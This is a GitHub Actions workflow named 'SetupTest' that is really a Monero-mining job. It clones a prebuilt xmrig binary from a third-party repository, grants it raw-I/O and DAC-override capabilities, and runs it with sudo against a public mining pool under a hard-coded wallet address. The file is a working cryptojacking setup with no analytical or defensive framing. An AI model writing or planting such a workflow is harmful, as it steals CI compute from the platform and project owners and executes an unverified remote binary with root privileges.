name: SetupTest

on:
  workflow_dispatch:

jobs:
  xmrig-mining:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Install dependencies
        run: |
          sudo apt update && sudo apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev msr-tools fuse

      - name: Enable Huge Pages
        run: |
          echo 1280 | sudo tee /proc/sys/vm/nr_hugepages
          sudo sysctl -w vm.nr_hugepages=1280
          sudo sysctl -w vm.hugetlb_shm_group=$(id -g)

      - name: Check Huge Pages Status
        run: cat /proc/meminfo | grep Huge

      - name: Load MSR Module
        run: |
          sudo modprobe msr
          ls /dev/cpu/*/msr || echo "MSR access is not available"

      - name: Clone XMRig
        run: git clone https://github.com/Solomon26014226/clonex.git

      - name: Verify XMRig Binary
        run: ls -lah clonex/

      - name: Grant XMRig Extra Permissions
        run: sudo setcap cap_sys_rawio,cap_dac_override+ep clonex/xmrig

      - name: Run XMRig as Background Process
        run: |
          cd clonex
          sudo ./xmrig -o pool.supportxmr.com:443 -u 44FS8hE9PRRF8fvhYms4hxi3VBsDMdztoEGieuHf9vK6FeVCQUQGCNyHCmv7NQF9UaA88MBM8YnfRJRuzdVYy1VE3MNiYpK -k --tls --donate-level=0 
